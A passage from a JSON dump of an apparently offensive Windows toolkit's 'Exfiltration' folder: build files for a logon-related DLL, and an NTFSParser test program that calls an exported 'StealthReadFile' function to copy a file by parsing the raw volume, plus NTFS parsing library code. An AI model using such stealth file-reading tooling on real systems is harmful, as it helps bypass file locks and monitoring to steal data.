<GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\" />\n    <ClInclude Include=\"targetver.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"dllmain.cpp\">\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">false</CompileAsManaged>\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">false</CompileAsManaged>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n      </PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n      </PrecompiledHeader>\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">false</CompileAsManaged>\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">false</CompileAsManaged>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n      </PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n      </PrecompiledHeader>\n    </ClCompile>\n    <ClCompile Include=\"logon.cpp\" />\n    <ClCompile Include=\"stdafx.cpp\">\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">Create</PrecompiledHeader>\n    </ClCompile>\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"targetver.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"stdafx.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"logon.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"dllmain.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp",
    "content": "// stdafx.cpp : source file that includes just the standard includes\n// logon.pch will be the pre-compiled header\n// stdafx.obj will contain the pre-compiled type information\n\n#include \"stdafx.h\"\n\n// TODO: reference any additional headers you need in STDAFX.H\n// and not in this file\n"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/logon/stdafx.h",
    "content": "// stdafx.h : include file for standard system include files,\n// or project specific include files that are used frequently, but\n// are changed infrequently\n//\n\n#pragma once\n\n#include \"targetver.h\"\n\n#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers\n// Windows Header Files:\n#include \"targetver.h\"\n#include <stdio.h>\n#include <tchar.h>\n#include <iostream>\n#include <string>\n#include <fstream>\n#include <ostream>\n#include <mutex>\n#include <Windows.h>\n#include <NTSecAPI.h>\n\n\n\n// TODO: reference additional headers your program requires here\n"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/logon/targetver.h",
    "content": "#pragma once\n\n// Including SDKDDKVer.h defines the highest available Windows platform.\n\n// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and\n// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.\n\n#include <SDKDDKVer.h>\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser/NTFS.h",
    "content": "/*\n * NTFS include files\n * \n * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n\n#ifndef __NTFS_H_CYB70289\n#define\t__NTFS_H_CYB70289\n\n#pragma pack(8)\n\n#include \"NTFS_Common.h\"\n#include \"NTFS_FileRecord.h\"\n#include \"NTFS_Attribute.h\"\n\n#pragma pack()\n\n#endif\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp",
    "content": "/*\n * \n * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n//\n// This code uses libraries released under GPLv2(or later) written by cyb70289 <cyb70289@gmail.com>\n\n#include \"stdafx.h\"\n#include \"NTFS.h\"\n#include \"NTFS_Attribute.h\"\n#include \"NTFS_Common.h\"\n#include \"NTFS_DataType.h\"\n#include \"NTFS_FileRecord.h\"\n\nusing namespace std;\n\ntypedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*);\n\nint _tmain(int argc, _TCHAR* argv[])\n{\n\tHMODULE parserDLLHandle = LoadLibraryA(\"NTFSParserDLL.dll\");\n\tHANDLE procAddress = GetProcAddress(parserDLLHandle, \"StealthReadFile\");\n\n\tStealthReadFile_Func StealthReadFile = (StealthReadFile_Func)procAddress;\n\n\tDWORD buffSize = 1024*1024;\n\tBYTE* buffer = new BYTE[buffSize];\n\tDWORD bytesRead = 0;\n\tULONGLONG bytesLeft = 0;\n\tDWORD ret = StealthReadFile(\"c:\\\\test\\\\test.txt\", buffer, buffSize, 0, &bytesRead, &bytesLeft);\n\n\tcout << \"Return value: \" << ret << endl;\n\n\tofstream myFile(\"c:\\\\test\\\\test2.txt\", ios::out | ios::binary);\n    myFile.write((char*)buffer, bytesRead);\n\n\treturn 0;\n}\n\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{2F38A7A9-D810-451B-BB19-273770AF4D25}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>NTFSParser</RootNamespace>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>NotSet</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>NotSet</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>false</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>false</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"NTFS.h\" />\n    <ClInclude Include=\"NTFS_Attribute.h\" />\n    <ClInclude Include=\"NTFS_Common.h\" />\n    <ClInclude Include=\"NTFS_DataType.h\" />\n    <ClInclude Include=\"NTFS_FileRecord.h\" />\n    <ClInclude Include=\"stdafx.h\" />\n    <ClInclude Include=\"targetver.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"NTFSParser.cpp\" />\n    <ClCompile Include=\"stdafx.cpp\">\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">Create</PrecompiledHeader>\n    </ClCompile>\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"targetver.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"NTFS.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"NTFS_Attribute.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"NTFS_Common.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"NTFS_DataType.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"NTFS_FileRecord.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"stdafx.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"NTFSParser.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser/NTFS_Attribute.h",
    "content": "/*\n * NTFS Attribute Classes\n * \n * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n\n#ifndef\t__NTFS_ATTRIBUTE_H_CYB70289\n#define\t__NTFS_ATTRIBUTE_H_CYB70289\n\n\n////////////////////////////////\n// List to hold parsed DataRuns\n////////////////////////////////\ntypedef struct tagDataRun_Entry\n{\n\tLONGLONG\t\t\tLCN;\t\t// -1 to indicate sparse data\n\tULONGLONG\t\t\tClusters;\n\tULONGLONG\t\t\tStartVCN;\n\tULONGLONG\t\t\tLastVCN;\n} DataRun_Entry;\ntypedef class CSList<DataRun_Entry> CDataRunList;\n\n////////////////////////////////////\n// List to hold Index Entry objects\n////////////////////////////////////\nclass CIndexEntry;\ntypedef class CSList<CIndexEntry> CIndexEntryList;\n\n\n////////////////////////////////\n// Attributes base class\n////////////////////////////////\nclass CAttrBase\n{\npublic:\n\tCAttrBase(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttrBase();\n\nprotected:\n\tconst ATTR_HEADER_COMMON *AttrHeader;\n\tWORD _SectorSize;\n\tDWORD _ClusterSize;\n\tDWORD _IndexBlockSize;\n\tHANDLE _hVolume;\n\tconst CFileRecord *FileRecord;\n\npublic:\n\t__inline const ATTR_HEADER_COMMON* GetAttrHeader() const;\n\t__inline DWORD GetAttrType() const;\n\t__inline DWORD GetAttrTotalSize() const;\n\t__inline BOOL IsNonResident() const;\n\t__inline WORD GetAttrFlags() const;\n\tint GetAttrName(char *buf, DWORD bufLen) const;\n\tint GetAttrName(wchar_t *buf, DWORD bufLen) const;\n\t__inline BOOL IsUnNamed() const;\n\nprotected:\n\tvirtual __inline BOOL IsDataRunOK() const = 0;\n\npublic:\n\tvirtual __inline ULONGLONG GetDataSize(ULONGLONG *allocSize = NULL) const = 0;\n\tvirtual BOOL ReadData(const ULONGLONG &offset, void *bufv, DWORD bufLen, DWORD *actural) const = 0;\n};\t// CAttrBase\n\nCAttrBase::CAttrBase(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr)\n{\n\t_ASSERT(ahc);\n\t_ASSERT(fr);\n\n\tAttrHeader = ahc;\n\tFileRecord = fr;\n\n\t_SectorSize = fr->Volume->SectorSize;\n\t_ClusterSize = fr->Volume->ClusterSize;\n\t_IndexBlockSize = fr->Volume->IndexBlockSize;\n\t_hVolume = fr->Volume->hVolume;\n}\n\nCAttrBase::~CAttrBase()\n{\n}\n\n__inline const ATTR_HEADER_COMMON* CAttrBase::GetAttrHeader() const\n{\n\treturn AttrHeader;\n}\n\n__inline DWORD CAttrBase::GetAttrType() const\n{\n\treturn AttrHeader->Type;\n}\n\n__inline DWORD CAttrBase::GetAttrTotalSize() const\n{\n\treturn AttrHeader->TotalSize;\n}\n\n__inline BOOL CAttrBase::IsNonResident() const\n{\n\treturn AttrHeader->NonResident;\n}\n\n__inline WORD CAttrBase::GetAttrFlags() const\n{\n\treturn AttrHeader->Flags;\n}\n\n// Get ANSI Attribute name\n// Return 0: Unnamed, <0: buffer too small, -buffersize, >0 Name length\nint CAttrBase::GetAttrName(char *buf, DWORD bufLen) const\n{\n\tif (AttrHeader->NameLength)\n\t{\n\t\tif (bufLen < AttrHeader->NameLength)\n\t\t\treturn -1*AttrHeader->NameLength;\t// buffer too small\n\n\t\twchar_t *namePtr = (wchar_t*)((BYTE*)AttrHeader + AttrHeader->NameOffset);\n\t\tint len = WideCharToMultiByte(CP_ACP, 0, namePtr, AttrHeader->NameLength,\n\t\t\tbuf, bufLen, NULL, NULL);\n\t\tif (len)\n\t\t{\n\t\t\tbuf[len] = '\\0';\n\t\t\tNTFS_TRACE1(\"Attribute name: %s\\n\", buf);\n\t\t\treturn len;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE(\"Unrecognized attribute name or Name buffer too small\\n\");\n\t\t\treturn -1*AttrHeader->NameLength;\n\t\t}\n\t}\n\telse\n\t{\n\t\tNTFS_TRACE(\"Attribute is unnamed\\n\");\n\t\treturn 0;\n\t}\n}\n\n// Get UNICODE Attribute name\n// Return 0: Unnamed, <0: buffer too small, -buffersize, >0 Name length\nint CAttrBase::GetAttrName(wchar_t *buf, DWORD bufLen) const\n{\n\tif (AttrHeader->NameLength)\n\t{\n\t\tif (bufLen < AttrHeader->NameLength)\n\t\t\treturn -1*AttrHeader->NameLength;\t// buffer too small\n\n\t\tbufLen = AttrHeader->NameLength;\n\t\twchar_t *namePtr = (wchar_t*)((BYTE*)AttrHeader + AttrHeader->NameOffset);\n\t\twcsncpy(buf, namePtr, bufLen);\n\t\tbuf[bufLen] = '\\0\\0';\n\n\t\tNTFS_TRACE(\"Unicode Attribute Name\\n\");\n\t\treturn bufLen;\n\t}\n\telse\n\t{\n\t\tNTFS_TRACE(\"Attribute is unnamed\\n\");\n\t\treturn 0;\n\t}\n}\n\n// Verify if this attribute is unnamed\n// Useful in analyzing MultiStream files\n__inline BOOL CAttrBase::IsUnNamed() const\n{\n\treturn (AttrHeader->NameLength == 0);\n}\n\n\n////////////////////////////////\n// Resident Attributes\n////////////////////////////////\nclass CAttrResident : public CAttrBase\n{\npublic:\n\tCAttrResident(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttrResident();\n\nprotected:\n\tconst ATTR_HEADER_RESIDENT *AttrHeaderR;\n\tconst void *AttrBody;\t// Points to Resident Data\n\tDWORD AttrBodySize;\t\t// Attribute Data Size\n\n\tvirtual __inline BOOL IsDataRunOK() const;\n\npublic:\n\tvirtual __inline ULONGLONG GetDataSize(ULONGLONG *allocSize = NULL) const;\n\tvirtual BOOL ReadData(const ULONGLONG &offset, void *bufv, DWORD bufLen, DWORD *actural) const;\n};\t// CAttrResident\n\nCAttrResident::CAttrResident(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrBase(ahc, fr)\n{\n\tAttrHeaderR = (ATTR_HEADER_RESIDENT*)ahc;\n\tAttrBody = (void*)((BYTE*)AttrHeaderR + AttrHeaderR->AttrOffset);\n\tAttrBodySize = AttrHeaderR->AttrSize;\n}\n\nCAttrResident::~CAttrResident()\n{\n}\n\n__inline BOOL CAttrResident::IsDataRunOK() const\n{\n\treturn TRUE;\t// Always OK for a resident attribute\n}\n\n// Return Actural Data Size\n// *allocSize = Allocated Size\n__inline ULONGLONG CAttrResident::GetDataSize(ULONGLONG *allocSize) const\n{\n\tif (allocSize)\n\t\t*allocSize = AttrBodySize;\n\n\treturn (ULONGLONG)AttrBodySize;\n}\n\n// Read \"bufLen\" bytes from \"offset\" into \"bufv\"\n// Number of bytes acturally read is returned in \"*actural\"\nBOOL CAttrResident::ReadData(const ULONGLONG &offset, void *bufv, DWORD bufLen, DWORD *actural) const\n{\n\t_ASSERT(bufv);\n\n\t*actural = 0;\n\tif (bufLen == 0)\n\t\treturn TRUE;\n\n\tDWORD offsetd = (DWORD)offset;\n\tif (offsetd >= AttrBodySize)\n\t\treturn FALSE;\t// offset parameter error\n\n\tif ((offsetd + bufLen) > AttrBodySize)\n\t\t*actural = AttrBodySize - offsetd;\t// Beyond scope\n\telse\n\t\t*actural = bufLen;\n\n\tmemcpy(bufv, (BYTE*)AttrBody + offsetd, *actural);\n\n\treturn TRUE;\n}\n\n\n////////////////////////////////\n// NonResident Attributes\n////////////////////////////////\nclass CAttrNonResident : public CAttrBase\n{\npublic:\n\tCAttrNonResident(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttrNonResident();\n\nprotected:\n\tconst ATTR_HEADER_NON_RESIDENT 